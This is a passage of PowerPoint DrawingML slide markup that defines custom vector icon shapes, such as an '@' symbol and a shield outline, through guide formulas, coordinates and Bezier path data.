                <a:gd name="connsiteY6" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3892469"/>
                <a:gd name="connsiteY7" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3892469"/>
                <a:gd name="connsiteY8" fmla="*/ 1517323 h 3948462"/>
                <a:gd name="connsiteX9" fmla="*/ 3706266 w 3892469"/>
                <a:gd name="connsiteY9" fmla="*/ 2457195 h 3948462"/>
                <a:gd name="connsiteX10" fmla="*/ 3164582 w 3892469"/>
                <a:gd name="connsiteY10" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3176822 w 3892469"/>
                <a:gd name="connsiteY11" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3146203 w 3892469"/>
                <a:gd name="connsiteY12" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3151211 w 3892469"/>
                <a:gd name="connsiteY13" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 2397082 w 3892469"/>
                <a:gd name="connsiteY14" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2396219 w 3892469"/>
                <a:gd name="connsiteY15" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1746058 w 3892469"/>
                <a:gd name="connsiteY16" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 990519 w 3892469"/>
                <a:gd name="connsiteY17" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 1593790 w 3892469"/>
                <a:gd name="connsiteY18" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1746058 w 3892469"/>
                <a:gd name="connsiteY19" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2206475 w 3892469"/>
                <a:gd name="connsiteY20" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2185910 w 3892469"/>
                <a:gd name="connsiteY21" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2656644 w 3892469"/>
                <a:gd name="connsiteY22" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2828567 w 3892469"/>
                <a:gd name="connsiteY23" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3362812 w 3892469"/>
                <a:gd name="connsiteY24" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3289926 w 3892469"/>
                <a:gd name="connsiteY25" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3290031 w 3892469"/>
                <a:gd name="connsiteY26" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 1700745 w 3892469"/>
                <a:gd name="connsiteY27" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 571995 w 3892469"/>
                <a:gd name="connsiteY28" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 2267548 w 3892469"/>
                <a:gd name="connsiteY29" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 3194376 w 3892469"/>
                <a:gd name="connsiteY30" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3268026 w 3892469"/>
                <a:gd name="connsiteY31" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 2347298 w 3892469"/>
                <a:gd name="connsiteY32" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 42617 w 3892469"/>
                <a:gd name="connsiteY33" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 1594841 w 3892469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2397082 w 3890413"/>
                <a:gd name="connsiteY13" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 2396219 w 3890413"/>
                <a:gd name="connsiteY14" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY15" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 990519 w 3890413"/>
                <a:gd name="connsiteY16" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1593790 w 3890413"/>
                <a:gd name="connsiteY17" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY18" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 2206475 w 3890413"/>
                <a:gd name="connsiteY19" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2185910 w 3890413"/>
                <a:gd name="connsiteY20" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2656644 w 3890413"/>
                <a:gd name="connsiteY21" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2828567 w 3890413"/>
                <a:gd name="connsiteY22" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 3362812 w 3890413"/>
                <a:gd name="connsiteY23" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3289926 w 3890413"/>
                <a:gd name="connsiteY24" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3290031 w 3890413"/>
                <a:gd name="connsiteY25" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 1700745 w 3890413"/>
                <a:gd name="connsiteY26" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 571995 w 3890413"/>
                <a:gd name="connsiteY27" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 2267548 w 3890413"/>
                <a:gd name="connsiteY28" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 3194376 w 3890413"/>
                <a:gd name="connsiteY29" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 3268026 w 3890413"/>
                <a:gd name="connsiteY30" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 2347298 w 3890413"/>
                <a:gd name="connsiteY31" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 42617 w 3890413"/>
                <a:gd name="connsiteY32" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 1594841 w 3890413"/>
                <a:gd name="connsiteY33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2397082 w 3890413"/>
                <a:gd name="connsiteY12" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 2396219 w 3890413"/>
                <a:gd name="connsiteY13" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY14" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 990519 w 3890413"/>
                <a:gd name="connsiteY15" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1593790 w 3890413"/>
                <a:gd name="connsiteY16" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY17" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 2206475 w 3890413"/>
                <a:gd name="connsiteY18" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 2185910 w 3890413"/>
                <a:gd name="connsiteY19" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2656644 w 3890413"/>
                <a:gd name="connsiteY20" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2828567 w 3890413"/>
                <a:gd name="connsiteY21" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 3362812 w 3890413"/>
                <a:gd name="connsiteY22" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 3289926 w 3890413"/>
                <a:gd name="connsiteY23" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3290031 w 3890413"/>
                <a:gd name="connsiteY24" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 1700745 w 3890413"/>
                <a:gd name="connsiteY25" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 571995 w 3890413"/>
                <a:gd name="connsiteY26" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 2267548 w 3890413"/>
                <a:gd name="connsiteY27" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 3194376 w 3890413"/>
                <a:gd name="connsiteY28" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 3268026 w 3890413"/>
                <a:gd name="connsiteY29" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 2347298 w 3890413"/>
                <a:gd name="connsiteY30" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 42617 w 3890413"/>
                <a:gd name="connsiteY31" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 1594841 w 3890413"/>
                <a:gd name="connsiteY32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2397082 w 3890413"/>
                <a:gd name="connsiteY11" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 2396219 w 3890413"/>
                <a:gd name="connsiteY12" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY13" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 990519 w 3890413"/>
                <a:gd name="connsiteY14" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 1593790 w 3890413"/>
                <a:gd name="connsiteY15" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY16" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 2206475 w 3890413"/>
                <a:gd name="connsiteY17" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 2185910 w 3890413"/>
                <a:gd name="connsiteY18" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 2656644 w 3890413"/>
                <a:gd name="connsiteY19" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2828567 w 3890413"/>
                <a:gd name="connsiteY20" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 3362812 w 3890413"/>
                <a:gd name="connsiteY21" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 3289926 w 3890413"/>
                <a:gd name="connsiteY22" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 3290031 w 3890413"/>
                <a:gd name="connsiteY23" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 1700745 w 3890413"/>
                <a:gd name="connsiteY24" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 571995 w 3890413"/>
                <a:gd name="connsiteY25" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 2267548 w 3890413"/>
                <a:gd name="connsiteY26" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 3194376 w 3890413"/>
                <a:gd name="connsiteY27" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 3268026 w 3890413"/>
                <a:gd name="connsiteY28" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 2347298 w 3890413"/>
                <a:gd name="connsiteY29" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 42617 w 3890413"/>
                <a:gd name="connsiteY30" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 1594841 w 3890413"/>
                <a:gd name="connsiteY31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0413" h="3948462">
                  <a:moveTo>
                    <a:pt x="1853384" y="1371624"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1768767" y="1390324"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1579409" y="1463487"/>
                    <a:pt x="1490873" y="1833773"/>
                    <a:pt x="1517577" y="2042010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1544281" y="2250247"/>
                    <a:pt x="1644086" y="2624290"/>
                    <a:pt x="1928990" y="2639747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2177093" y="2653207"/>
                    <a:pt x="2337423" y="2363017"/>
                    <a:pt x="2318674" y="2006358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2310210" y="1948950"/>
                    <a:pt x="2301678" y="1891436"/>
                    <a:pt x="2293344" y="1834228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2229725" y="1555945"/>
                    <a:pt x="2050691" y="1359067"/>
                    <a:pt x="1853384" y="1371624"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1594841" y="45653"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2527821" y="-128041"/>
                    <a:pt x="3626282" y="158796"/>
                    <a:pt x="3869632" y="1517323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3939308" y="2058696"/>
                    <a:pt x="3820785" y="2251376"/>
                    <a:pt x="3706266" y="2457195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3132098" y="3124925"/>
                    <a:pt x="2589274" y="2611359"/>
                    <a:pt x="2548384" y="2446988"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2411721" y="3024903"/>
                    <a:pt x="2005702" y="3164775"/>
                    <a:pt x="1746058" y="3093574"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1486414" y="3022373"/>
                    <a:pt x="990519" y="2612821"/>
                    <a:pt x="990519" y="2019783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="990519" y="1500875"/>
                    <a:pt x="1249504" y="1067935"/>
                    <a:pt x="1593790" y="967808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1642974" y="953504"/>
                    <a:pt x="1694009" y="949376"/>
                    <a:pt x="1746058" y="945992"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2004670" y="929176"/>
                    <a:pt x="2081338" y="1030119"/>
                    <a:pt x="2206475" y="1173924"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2194343" y="1061758"/>
                    <a:pt x="2187003" y="961165"/>
                    <a:pt x="2185910" y="877882"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2656644" y="803138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2828567" y="2099525"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2888366" y="2544108"/>
                    <a:pt x="3261961" y="2420799"/>
                    <a:pt x="3362812" y="2002360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3355320" y="1625023"/>
                    <a:pt x="3366534" y="1729632"/>
                    <a:pt x="3289926" y="1346695"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3290031" y="1346798"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3068547" y="637774"/>
                    <a:pt x="2419129" y="439933"/>
                    <a:pt x="1700745" y="575031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="890947" y="727320"/>
                    <a:pt x="415476" y="1491783"/>
                    <a:pt x="571995" y="2274165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="728513" y="3056546"/>
                    <a:pt x="1580131" y="3572543"/>
                    <a:pt x="2267548" y="3408286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2796517" y="3281890"/>
                    <a:pt x="2641988" y="3320887"/>
                    <a:pt x="3194376" y="3072653"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3249441" y="3306078"/>
                    <a:pt x="3239115" y="3309742"/>
                    <a:pt x="3268026" y="3509545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3021841" y="3717756"/>
                    <a:pt x="2685602" y="3836362"/>
                    <a:pt x="2347298" y="3904041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1157336" y="4112956"/>
                    <a:pt x="289475" y="3581660"/>
                    <a:pt x="42617" y="2380068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-204242" y="1178477"/>
                    <a:pt x="661862" y="219348"/>
                    <a:pt x="1594841" y="456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14E2E14-9B57-4A66-85E1-221EAEE17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6880" y="2771935"/>
              <a:ext cx="315652" cy="359610"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3456727" h="3938119">
                  <a:moveTo>
                    <a:pt x="1728364" y="1961325"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1726089" y="2407152"/>
                    <a:pt x="1737463" y="2812034"/>
                    <a:pt x="1735188" y="3257861"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2394830" y="3057694"/>
                    <a:pt x="2610919" y="2352560"/>
                    <a:pt x="2765594" y="1981796"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1728362" y="682044"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1355324" y="868563"/>
                    <a:pt x="1166530" y="952725"/>
                    <a:pt x="609247" y="1002767"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="606972" y="1330312"/>
                    <a:pt x="631992" y="1623739"/>
                    <a:pt x="704780" y="1964933"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1728363" y="1971757"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1728363" y="1541853"/>
                    <a:pt x="1728362" y="1111948"/>
                    <a:pt x="1728362" y="682044"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1723409" y="487996"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1725062" y="488690"/>
                    <a:pt x="1726712" y="489384"/>
                    <a:pt x="1728363" y="490064"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1730015" y="489384"/>
                    <a:pt x="1731666" y="488690"/>
                    <a:pt x="1733319" y="487996"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1733319" y="492131"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2179467" y="679460"/>
                    <a:pt x="2405896" y="769409"/>
                    <a:pt x="2817789" y="813808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2971516" y="823489"/>
                    <a:pt x="3036247" y="875307"/>
                    <a:pt x="3033236" y="1061333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3015439" y="2441328"/>
                    <a:pt x="2363638" y="3359629"/>
                    <a:pt x="1733319" y="3448048"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1733319" y="3450123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728363" y="3449086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1723409" y="3450123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1723409" y="3448048"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1093089" y="3359629"/>
                    <a:pt x="441289" y="2441328"/>
                    <a:pt x="423491" y="1061333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="420479" y="875307"/>
                    <a:pt x="485211" y="823489"/>
                    <a:pt x="638937" y="813808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1050832" y="769409"/>
                    <a:pt x="1277261" y="679460"/>
                    <a:pt x="1723409" y="492131"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1722802" y="306889"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1722802" y="311530"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1222099" y="521767"/>
                    <a:pt x="967982" y="622713"/>
                    <a:pt x="505720" y="672542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333196" y="683408"/>
                    <a:pt x="260550" y="741561"/>
                    <a:pt x="263929" y="950334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283902" y="2499079"/>
                    <a:pt x="1015407" y="3529669"/>
                    <a:pt x="1722802" y="3628902"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1722802" y="3631230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728365" y="3630065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1733925" y="3631230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1733925" y="3628902"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2441322" y="3529669"/>
                    <a:pt x="3172826" y="2499079"/>
                    <a:pt x="3192800" y="950334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3196179" y="741561"/>
                    <a:pt x="3123532" y="683408"/>
                    <a:pt x="2951007" y="672542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2488747" y="622713"/>
                    <a:pt x="2234630" y="521767"/>
                    <a:pt x="1733925" y="311530"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1733925" y="306889"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1732071" y="307669"/>
                    <a:pt x="1730218" y="308445"/>
                    <a:pt x="1728365" y="309209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1726510" y="308445"/>
                    <a:pt x="1724659" y="307669"/>
                    <a:pt x="1722802" y="306889"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1721800" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1723991" y="923"/>
                    <a:pt x="1726176" y="1844"/>
                    <a:pt x="1728363" y="2749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1730551" y="1844"/>
                    <a:pt x="1732737" y="923"/>
                    <a:pt x="1734926" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1734926" y="5497"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2325825" y="254550"/>
                    <a:pt x="2625718" y="374136"/>
                    <a:pt x="3171248" y="433164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3374850" y="446035"/>
                    <a:pt x="3460584" y="514926"/>
                    <a:pt x="3456595" y="762245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3433024" y="2596936"/>
                    <a:pt x="2569749" y="3817807"/>
                    <a:pt x="1734926" y="3935360"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1734926" y="3938119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728363" y="3936740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721800" y="3938119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721800" y="3935360"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="886977" y="3817807"/>
                    <a:pt x="23703" y="2596936"/>
                    <a:pt x="132" y="762245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-3858" y="514926"/>
                    <a:pt x="81876" y="446035"/>
                    <a:pt x="285478" y="433164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="831010" y="374136"/>
                    <a:pt x="1130903" y="254550"/>
                    <a:pt x="1721800" y="54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7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6065040D-3594-4BAC-A8C1-673E9B9D9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5543" y="2519661"/>
              <a:ext cx="338578" cy="33854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1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2612BCB4-6800-4D3F-84A7-B411A2B0064A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2648398">
              <a:off x="8942310" y="2514803"/>
              <a:ext cx="148930" cy="380894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7806EA61-FF58-47E3-B6B3-7DE8F13A1EEA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8651645" y="4749636"/>
              <a:ext cx="318301" cy="317452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99B57F1-325B-4FFB-91E0-0B240A518703}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8268788" y="3120081"/>
              <a:ext cx="291831" cy="251871"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 241139 w 366142"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 316007"/>
                <a:gd name="connsiteX1" fmla="*/ 306633 w 366142"/>
                <a:gd name="connsiteY1" fmla="*/ 31202 h 316007"/>
                <a:gd name="connsiteX2" fmla="*/ 349699 w 366142"/>
                <a:gd name="connsiteY2" fmla="*/ 10558 h 316007"/>
                <a:gd name="connsiteX3" fmla="*/ 325569 w 366142"/>
                <a:gd name="connsiteY3" fmla="*/ 59830 h 316007"/>
                <a:gd name="connsiteX4" fmla="*/ 366142 w 366142"/>
                <a:gd name="connsiteY4" fmla="*/ 52395 h 316007"/>
                <a:gd name="connsiteX5" fmla="*/ 334454 w 366142"/>
                <a:gd name="connsiteY5" fmla="*/ 94697 h 316007"/>
                <a:gd name="connsiteX6" fmla="*/ 316939 w 366142"/>
                <a:gd name="connsiteY6" fmla="*/ 174999 h 316007"/>
                <a:gd name="connsiteX7" fmla="*/ 184305 w 366142"/>
                <a:gd name="connsiteY7" fmla="*/ 311458 h 316007"/>
                <a:gd name="connsiteX8" fmla="*/ 27716 w 366142"/>
                <a:gd name="connsiteY8" fmla="*/ 295316 h 316007"/>
                <a:gd name="connsiteX9" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY9" fmla="*/ 281129 h 316007"/>
                <a:gd name="connsiteX10" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY10" fmla="*/ 268036 h 316007"/>
                <a:gd name="connsiteX11" fmla="*/ 23178 w 366142"/>
                <a:gd name="connsiteY11" fmla="*/ 266110 h 316007"/>
                <a:gd name="connsiteX12" fmla="*/ 108726 w 366142"/>
                <a:gd name="connsiteY12" fmla="*/ 240807 h 316007"/>
                <a:gd name="connsiteX13" fmla="*/ 20535 w 366142"/>
                <a:gd name="connsiteY13" fmla="*/ 200079 h 316007"/>
                <a:gd name="connsiteX14" fmla="*/ 70653 w 366142"/>
                <a:gd name="connsiteY14" fmla="*/ 194871 h 316007"/>
                <a:gd name="connsiteX15" fmla="*/ 20899 w 366142"/>
                <a:gd name="connsiteY15" fmla="*/ 168840 h 316007"/>
                <a:gd name="connsiteX16" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY16" fmla="*/ 146258 h 316007"/>
                <a:gd name="connsiteX17" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY17" fmla="*/ 116697 h 316007"/>
                <a:gd name="connsiteX18" fmla="*/ 14104 w 366142"/>
                <a:gd name="connsiteY18" fmla="*/ 121836 h 316007"/>
                <a:gd name="connsiteX19" fmla="*/ 40441 w 366142"/>
                <a:gd name="connsiteY19" fmla="*/ 126434 h 316007"/>
                <a:gd name="connsiteX20" fmla="*/ 20722 w 366142"/>
                <a:gd name="connsiteY20" fmla="*/ 8541 h 316007"/>
                <a:gd name="connsiteX21" fmla="*/ 168525 w 366142"/>
                <a:gd name="connsiteY21" fmla="*/ 104817 h 316007"/>
                <a:gd name="connsiteX22" fmla="*/ 165796 w 366142"/>
                <a:gd name="connsiteY22" fmla="*/ 68430 h 316007"/>
                <a:gd name="connsiteX23" fmla="*/ 241139 w 366142"/>
